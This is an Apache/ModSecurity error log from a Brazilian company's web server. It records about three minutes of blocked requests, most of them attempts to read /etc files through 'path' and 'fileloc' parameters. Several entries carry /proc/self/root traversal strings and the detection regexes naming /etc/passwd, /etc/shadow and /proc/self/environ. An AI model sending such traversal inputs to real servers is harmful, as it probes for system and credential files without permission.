[Fri Mar 20 10:28:04.760564 2026] [:error] [pid 21219:tid 140411741927168] [client 57.141.18.51:35424] [client 57.141.18.51] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LZPXLqtnMIWvjpaK5aQAAAoA"]
[Fri Mar 20 10:28:07.246229 2026] [:error] [pid 7235:tid 140411716749056] [client 57.141.18.45:35474] [client 57.141.18.45] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LZ_qxLDW4GITHUkQItAAAAQM"]
[Fri Mar 20 10:28:11.766579 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.243.128:38596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1LawF0L0L-SsrnPo6H7QAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 10:28:13.079979 2026] [:error] [pid 21219:tid 140411708356352] [client 57.141.18.111:35674] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LbfXLqtnMIWvjpaK5cQAAAoQ"]
[Fri Mar 20 10:28:25.953525 2026] [:error] [pid 15826:tid 140411708356352] [client 57.141.18.52:36088] [client 57.141.18.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LeeoXxyEfFpUF8f-fUAAAAUQ"]
[Fri Mar 20 10:28:29.639835 2026] [:error] [pid 21219:tid 140411733534464] [client 57.141.18.69:36214] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1LffXLqtnMIWvjpaK5eQAAAoE"]
[Fri Mar 20 10:28:29.897199 2026] [:error] [pid 31215:tid 140411666392832] [client 57.141.18.22:36218] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1LfQF0L0L-SsrnPo6H9QAAAsk"]
[Fri Mar 20 10:28:30.210312 2026] [:error] [pid 31215:tid 140411624429312] [client 57.141.18.54:36222] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1LfgF0L0L-SsrnPo6H9gAAAs4"]
[Fri Mar 20 10:28:35.047183 2026] [:error] [pid 11642:tid 140411616036608] [client 74.7.243.128:36570] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1Lg7ninkcc-iUj5Ap80QAAA48"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:28:47.909805 2026] [mime_magic:error] [pid 31215:tid 140411557287680] (70014)End of file found: [client 57.141.18.100:37034] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:28:58.519427 2026] [mime_magic:error] [pid 7235:tid 140411666392832] (70014)End of file found: [client 216.73.216.191:37504] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 10:29:04.946898 2026] [access_compat:error] [pid 11642:tid 140411683178240] [client 113.199.226.254:3783] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Fri Mar 20 10:29:10.074177 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.228.61:43134] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1LpvqxLDW4GITHUkQI2gAAARg"]
[Fri Mar 20 10:29:12.046585 2026] [:error] [pid 10189:tid 140411590858496] [client 57.141.18.5:38010] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1LqDJ3M9BSuKP7CAZBmwAAAJI"]
[Fri Mar 20 10:29:21.387906 2026] [:error] [pid 21219:tid 140411624429312] [client 57.141.18.99:38352] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LsfXLqtnMIWvjpaK5tAAAAo4"]
[Fri Mar 20 10:29:30.023100 2026] [:error] [pid 10189:tid 140411548894976] [client 57.141.18.66:38674] [client 57.141.18.66] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/chrony.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LujJ3M9BSuKP7CAZBpQAAAJc"]
[Fri Mar 20 10:29:41.803088 2026] [:error] [pid 11167:tid 140411582465792] [client 57.141.18.3:39050] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1LxfHIg5MgXLBnicMVeQAAAdM"]
[Fri Mar 20 10:29:44.163928 2026] [:error] [pid 31215:tid 140411574073088] [client 57.141.18.9:39164] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LyAF0L0L-SsrnPo6IIAAAAtQ"]
[Fri Mar 20 10:29:49.349433 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.243.128:37428] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1LzeoXxyEfFpUF8f-fvgAAAUY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:29:50.434630 2026] [:error] [pid 7893:tid 140411741927168] [client 57.141.18.106:39420] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/securetty"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1LzhCii7xarUs8iHaJPgAAAgA"]
[Fri Mar 20 10:29:53.583284 2026] [:error] [pid 21219:tid 140411733534464] [client 57.141.18.41:39654] [client 57.141.18.41] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1L0fXLqtnMIWvjpaK52QAAAoE"]
[Fri Mar 20 10:30:08.188111 2026] [mime_magic:error] [pid 9818:tid 140411733534464] (70014)End of file found: [client 74.7.241.31:55606] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/lib/systemd/user
[Fri Mar 20 10:30:28.791109 2026] [:error] [pid 21219:tid 140411565680384] [client 57.141.18.7:41168] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1L9PXLqtnMIWvjpaK59QAAApU"]
[Fri Mar 20 10:30:29.831313 2026] [:error] [pid 31215:tid 140411666392832] [client 74.7.244.43:42846] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1L9QF0L0L-SsrnPo6IVAAAAsk"]
[Fri Mar 20 10:30:32.071312 2026] [:error] [pid 31215:tid 140411699963648] [client 74.7.241.31:54218] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1L-AF0L0L-SsrnPo6IVwAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:30:34.460395 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.241.31:45392] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1L-gF0L0L-SsrnPo6IWgAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 10:30:34.690252 2026] [:error] [pid 11167:tid 140411674785536] [client 57.141.18.40:41334] [client 57.141.18.40] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1L-vHIg5MgXLBnicMVnAAAAcg"]
[Fri Mar 20 10:30:43.723803 2026] [:error] [pid 21219:tid 140411733534464] [client 57.141.18.62:41568] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1MA_XLqtnMIWvjpaK6BwAAAoE"]
[Fri Mar 20 10:30:46.362628 2026] [:error] [pid 21219:tid 140411607643904] [client 57.141.18.17:41668] [client 57.141.18.17] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1MBvXLqtnMIWvjpaK6DQAAApA"]
[Fri Mar 20 10:30:47.428726 2026] [:error] [pid 11167:tid 140411632822016] [client 57.141.18.95:41738] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/resolv.conf.save"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/piedmont/suthora012521478332.phtml"] [unique_id "ab1MB_HIg5MgXLBnicMVnwAAAc0"]
[Fri Mar 20 10:31:16.135376 2026] [:error] [pid 21219:tid 140411691570944] [client 57.141.18.31:42990] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1MJPXLqtnMIWvjpaK6JgAAAoY"]
[Fri Mar 20 10:31:19.013787 2026] [mime_magic:error] [pid 9818:tid 140411641214720] (70014)End of file found: [client 57.141.18.13:43120] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
